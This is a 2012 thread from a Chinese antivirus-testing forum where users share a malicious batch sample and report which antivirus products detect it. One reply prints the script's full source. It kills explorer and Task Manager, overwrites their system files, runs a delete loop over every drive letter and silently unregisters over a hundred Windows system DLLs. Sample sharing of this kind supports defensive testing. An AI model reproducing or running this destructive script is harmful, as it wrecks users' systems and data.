查看: 3161|回复: 14
收起左侧

[病毒样本] 病毒样本

[复制链接]
蓝天二号
发表于 2012-6-27 21:29:18 | 显示全部楼层 |阅读模式
本帖最后由 蓝天二号 于 2012-6-27 21:31 编辑

打开会直接下载文件。。http://bbs.duba.net/forum.php?mo ... DI5NDkwfDIyNzE5ODc3

瑞星报了:


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Kevin_Memo
发表于 2012-6-27 21:30:59 | 显示全部楼层
恶作剧程序
  1. rem By Milo
  2. @echo off  

  3. rem 全屏代码。。

  4. echo exit|%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_|debug>nul  
  5. chcp 437>nul  
  6. graftabl 936>nul  
  7. color 0a  

  8. rem 关闭explorer并格盘

  9. set "a=c,d,e,f,G,h,I,a,j,m,n,o,l,k,p,q,r,s,t,u,v,w,x,y,z"  
  10. taskkill /im explorer.exe /f  
  11. copy %systemroot%\explorer.exe 1.exe  
  12. >%systemroot%\explorer.exe echo .  
  13. taskkill /im taskmgr.exe /f  
  14. copy %systemroot%\taskmgr.exe 2.exe  
  15. >%systemroot%\system32\taskmgr.exe echo .  
  16. for %%i in (%a%) do delete %%i:  

  17. rem 反向注册系统dll

  18. regsvr32 /s /u *.dll

  19. rundll32.exe advpack.dll /DelNodeRunDLL32 %systemroot%\System32\dacui.dll
  20. rundll32.exe advpack.dll /DelNodeRunDLL32 %systemroot%\Catroot\icatalog.mdb
  21. regsvr32 /s /u setupwbv.dll
  22. regsvr32 /s /u wininet.dll
  23. regsvr32 /s /u comcat.dll
  24. regsvr32 /s /u shdoc401.dll
  25. regsvr32 /s /u shdoc401.dll /i
  26. regsvr32 /s /u asctrls.ocx
  27. regsvr32 /s /u oleaut32.dll
  28. regsvr32 /s /u shdocvw.dll /I
  29. regsvr32 /s /u shdocvw.dll
  30. regsvr32 /s /u browseui.dll
  31. regsvr32 /s /u browseui.dll /I
  32. regsvr32 /s /u msrating.dll
  33. regsvr32 /s /u mlang.dll
  34. regsvr32 /s /u hlink.dll
  35. regsvr32 /s /u mshtml.dll
  36. regsvr32 /s /u mshtmled.dll
  37. regsvr32 /s /u urlmon.dll
  38. regsvr32 /s /u plugin.ocx
  39. regsvr32 /s /u sendmail.dll
  40. regsvr32 /s /u comctl32.dll /i
  41. regsvr32 /s /u inetcpl.cpl /i
  42. regsvr32 /s /u mshtml.dll /i
  43. regsvr32 /s /u scrobj.dll
  44. regsvr32 /s /u mmefxe.ocx
  45. regsvr32 /s /u proctexe.ocx mshta.exe /register
  46. regsvr32 /s /u corpol.dll
  47. regsvr32 /s /u jscript.dll
  48. regsvr32 /s /u msxml.dll
  49. regsvr32 /s /u imgutil.dll
  50. regsvr32 /s /u thumbvw.dll
  51. regsvr32 /s /u cryptext.dll
  52. regsvr32 /s /u rsabase.dll
  53. regsvr32 /s /u triedit.dll
  54. regsvr32 /s /u dhtmled.ocx
  55. regsvr32 /s /u inseng.dll
  56. regsvr32 /s /u iesetup.dll /i
  57. regsvr32 /s /u hmmapi.dll
  58. regsvr32 /s /u cryptdlg.dll
  59. regsvr32 /s /u actxprxy.dll
  60. regsvr32 /s /u dispex.dll
  61. regsvr32 /s /u occache.dll
  62. regsvr32 /s /u occache.dll /i
  63. regsvr32 /s /u iepeers.dll
  64. regsvr32 /s /u wininet.dll /i
  65. regsvr32 /s /u urlmon.dll /i
  66. regsvr32 /s /u digest.dll /i
  67. regsvr32 /s /u cdfview.dll
  68. regsvr32 /s /u webcheck.dll
  69. regsvr32 /s /u mobsync.dll
  70. regsvr32 /s /u pngfilt.dll
  71. regsvr32 /s /u licmgr10.dll
  72. regsvr32 /s /u icmfilter.dll
  73. regsvr32 /s /u hhctrl.ocx
  74. regsvr32 /s /u inetcfg.dll
  75. regsvr32 /s /u trialoc.dll
  76. regsvr32 /s /u tdc.ocx
  77. regsvr32 /s /u MSR2C.DLL
  78. regsvr32 /s /u msident.dll
  79. regsvr32 /s /u msieftp.dll
  80. regsvr32 /s /u xmsconf.ocx
  81. regsvr32 /s /u ils.dll
  82. regsvr32 /s /u msoeacct.dll
  83. regsvr32 /s /u wab32.dll
  84. regsvr32 /s /u wabimp.dll
  85. regsvr32 /s /u wabfind.dll
  86. regsvr32 /s /u oemiglib.dll
  87. regsvr32 /s /u directdb.dll
  88. regsvr32 /s /u inetcomm.dll
  89. regsvr32 /s /u msoe.dll
  90. regsvr32 /s /u oeimport.dll
  91. regsvr32 /s /u msdxm.ocx
  92. regsvr32 /s /u dxmasf.dll
  93. regsvr32 /s /u laprxy.dll
  94. regsvr32 /s /u l3codecx.ax
  95. regsvr32 /s /u acelpdec.ax
  96. regsvr32 /s /u mpg4ds32.ax
  97. regsvr32 /s /u voxmsdec.ax
  98. regsvr32 /s /u danim.dll
  99. regsvr32 /s /u Daxctle.ocx
  100. regsvr32 /s /u lmrt.dll
  101. regsvr32 /s /u datime.dll
  102. regsvr32 /s /u dxtrans.dll
  103. regsvr32 /s /u dxtmsft.dll
  104. regsvr32 /s /u vgx.dll
  105. regsvr32 /s /u WEBPOST.DLL
  106. regsvr32 /s /u WPWIZDLL.DLL
  107. regsvr32 /s /u POSTWPP.DLL
  108. regsvr32 /s /u CRSWPP.DLL
  109. regsvr32 /s /u FTPWPP.DLL
  110. regsvr32 /s /u FPWPP.DLL
  111. regsvr32 /s /u FLUPL.OCX
  112. regsvr32 /s /u wshom.ocx
  113. regsvr32 /s /u wshext.dll
  114. regsvr32 /s /u vbscript.dll
  115. regsvr32 /s /u wupdinfo.dll
  116. regsvr32 /s /u shimgvw.dll
  117. regsvr32 /s /u wmpdxm.dll
  118. regsvr32 /s /u appwiz.cpl
  119. regsvr32 /s /u msi.dll
  120. regsvr32 /s /u /i shell32.dll
  121. regsvr32 /s /u scrrun.dll mstinit.exe /setup
  122. regsvr32 /s /u msnsspc.dll /SspcCreateSspiReg
  123. regsvr32 /s /u msapsspc.dll /SspcCreateSspiReg
复制代码
3801187
发表于 2012-6-27 21:36:23 | 显示全部楼层
有危险行为,必须用任务管理器强制结束CMD

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
天山童姥
发表于 2012-6-27 21:38:16 | 显示全部楼层
咚咚咚!已经检测到危害!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Nocria
发表于 2012-6-27 21:39:53 | 显示全部楼层
ESET killed.

C:\Users\TOSHIBA\Desktop\88\88.bat - BAT/Agent.NHZ 特洛伊木马
Dust-;羅錠
发表于 2012-6-27 21:41:14 | 显示全部楼层
大蜘蛛clean,已上报。
liwnpin
发表于 2012-6-27 21:47:53 | 显示全部楼层
G-DATA阻止打开网页
红蛋蛋
发表于 2012-6-27 21:49:27 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
泡椒鸡爪
发表于 2012-6-27 21:57:09 | 显示全部楼层
微点 kill
迷惘的执著
发表于 2012-6-27 22:10:57 | 显示全部楼层
过 卡巴
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-9-25 12:53 , Processed in 0.128620 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表